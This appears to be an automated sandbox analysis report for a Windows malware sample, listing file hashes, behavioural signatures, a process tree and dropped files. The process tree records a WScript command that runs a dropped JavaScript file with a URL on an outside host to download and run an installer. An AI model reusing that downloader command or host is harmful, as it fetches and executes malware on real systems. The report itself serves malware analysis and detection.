Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
11-05-2024 08:19
Static task
static1
Behavioral task
behavioral1
Sample
33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe
-
Size
184KB
-
MD5
33a3c781df3a2ce36310527ffee586ff
-
SHA1
d79cbd67ca91b2c556549b5ded95e495de7394f8
-
SHA256
f4ce2d35f93b49560daac1d7afb1d7f65c9016aa5938685d235b3880b772d0ee
-
SHA512
e2e7ae62e36300add0e3eb2e4232f2b708419d90cda9d1f78c5f9febf90db973913827205583696016377864912c405829c22d8dda571e3e4e3e5631d59fe5ee
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3f:/7BSH8zUB+nGESaaRvoB7FJNndnu
Malware Config
Signatures
-
Blocklisted process makes network request 11 IoCs
Processes:
WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeflow pid process 6 2108 WScript.exe 8 2108 WScript.exe 10 2108 WScript.exe 12 2528 WScript.exe 13 2528 WScript.exe 15 2172 WScript.exe 16 2172 WScript.exe 18 1844 WScript.exe 19 1844 WScript.exe 22 1764 WScript.exe 23 1764 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exedescription pid process target process PID 2236 wrote to memory of 2108 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2108 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2108 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2108 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2528 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2528 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2528 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2528 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2172 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2172 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2172 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 2172 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 1844 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 1844 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 1844 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 1844 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 1764 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 1764 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 1764 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe PID 2236 wrote to memory of 1764 2236 33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\33a3c781df3a2ce36310527ffee586ff_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf201E.js" http://www.djapp.info/?domain=yVaNcxCfFP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf201E.exe2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf201E.js" http://www.djapp.info/?domain=yVaNcxCfFP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf201E.exe2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf201E.js" http://www.djapp.info/?domain=yVaNcxCfFP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf201E.exe2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf201E.js" http://www.djapp.info/?domain=yVaNcxCfFP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf201E.exe2⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf201E.js" http://www.djapp.info/?domain=yVaNcxCfFP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf201E.exe2⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
1KB
MD52a8fa256ce6a53132c6e1887aec2dd90
SHA13c3712696c81ffbf3f78767fa642115336718db0
SHA2564372b48ab69f94556f8124623513fe956790e5250372c13577d51de0a309a2a6
SHA51286c1a4da1b625219443ffa86cf04f4fa477746d0f1ff2de1c8c8605fcb4eed09b9aa3a7e7a64c8ad59c50b2a65bf25d5ef493bf9b06726ecb83aa9519ef9f11b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464Filesize
724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAFilesize
410B
MD52190726498c0441dcac25303ecd9a69d
SHA11e26e5eef5ee95df7edd01b2ac57b0a6247275d7
SHA256c37876e2433907eb60f00ad9706b3534d21262133a325bfadf3bdccc2e0840e8
SHA51201581a18efaf540d3b9469cfff09f5c6b754b8363209325e0c0ea65dda076ca3075099dfcddee2d3d03d9e569c52b59fe62dfa13194d0ead5f446f81fe52508b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015Filesize
344B
MD5ed32909f901b4637b2b58965a551064d
SHA105195c2c6c20768aa1a814690aadefe920870738
SHA256186ecb36cfe6ab8a6e360111def9f06adf3f37c660f3750641631d5acbdf40b6
SHA512c0e7ee6db7c522cd2347bebc9963b1a84d0f9d41f0ed6071b4227bb0b25ca34ef23d1942f219301dd3fb8a51770ac3c83d21f49ccd3dc3e60dd51274b42247bd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464Filesize
392B
MD5318c50501faa98085cb1e0a5657856ce
SHA1dc41e004153923be321aee364d3d5175ccf77118
SHA256c293840e25eea6cce2d35887c6cacf9d7dcc9d3a9ebe7c8e9c9f76ef85d2014c
SHA5126ef39ae321b390e06e716184245433069e58af8d837f337cf06130b7c609ec2aba93b9c682b9580490277296c33b22fcbff5fdaeb70cde30ddae6b76e91fd382
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htmFilesize
40KB
MD59df734d07fb409206af9792edda6a097
SHA11cf61821beb62d3618108408b834db47379403fc
SHA2565c3ee1aa0a8daa756717259d23d496535eba482b210c5ae74c9e04f19b128ed6
SHA512c39615826a62867c5efed0225359098dfcc9ad7648c74393363e09e3b513ce8d0ef62d367dea8c4e019a9892cf88813bf448a685b8ac7b9428dcaa364c7eece3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2XHJXO3H\domain_profile[1].htmFilesize
6KB
MD54c6b2f1db3eec8e4d483008d354534d1
SHA1d19548c5a225f29f2bd9eb3f9d37a0cb103b29b8
SHA25629931b042a966530c1b330e49846956b80f902d5384f27ce3ae667cfb528b25e
SHA51269c806e06017859ec443d89c73dbd495113379249158aac3db86f9e20a98d04738c81ee8d656c80890aa52fff775453713d9afc4a7fd0c1d026f759457f669c0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htmFilesize
40KB
MD52a6cef341107cea1bb6a5321e5d951c1
SHA1e9b32d34f1d0550289c2c88f298d9368b4581369
SHA256bcd27f53d198ee6839710bc772141a82747c07fccdc71c833c3327cfefc15b11
SHA5122ff6eb44d2f5dc0ff5094f951f35cdde3999ea0ddd620e6093ef09a23f2f3c8e1320c39740be176ec68858de716e0f33485e6df1ffdfcde51bc9c7e9f71dac46
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H09CVCL3\domain_profile[1].htmFilesize
40KB
MD57ea0c9653d89830c9b4eb44d7229e020
SHA1d0b97734155f149a3f579a50192fc32d4685e8b5
SHA256aedb6ccbedd38e2292ad1a3f96cb2124c8f0c5d945c60ff60192fcb092d0b670
SHA51290ba70adf998413ed7f8f0f72e3d42ef1671bad0ad881a57d5e849478d3cb0814ac158113e1ea9fa82c8f6ff878971a4c7e8c0db9b2de1d0ee0acc2dd7f74cee
-
C:\Users\Admin\AppData\Local\Temp\Cab4F0A.tmpFilesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
C:\Users\Admin\AppData\Local\Temp\Tar675C.tmpFilesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Local\Temp\fuf201E.jsFilesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\VN8NNKTE.txtFilesize
175B
MD5c8d30980596019d52982553907cc871c
SHA11ed6c26152bc6e3a7e75f22ad6bc376beae06ac5
SHA256eb2bbb735aa9d44ab220cd8a5c251eadbc249bf79a0a7a6748c580175605bea9
SHA512ec8acb6f5fb1cc1086a6a0f58ffa5d0175174f0b9af30450d9b588c2b22d41074997ccf5583a262294ae68c576fd8af9d7f48bbbb52c248650c5d23665465f42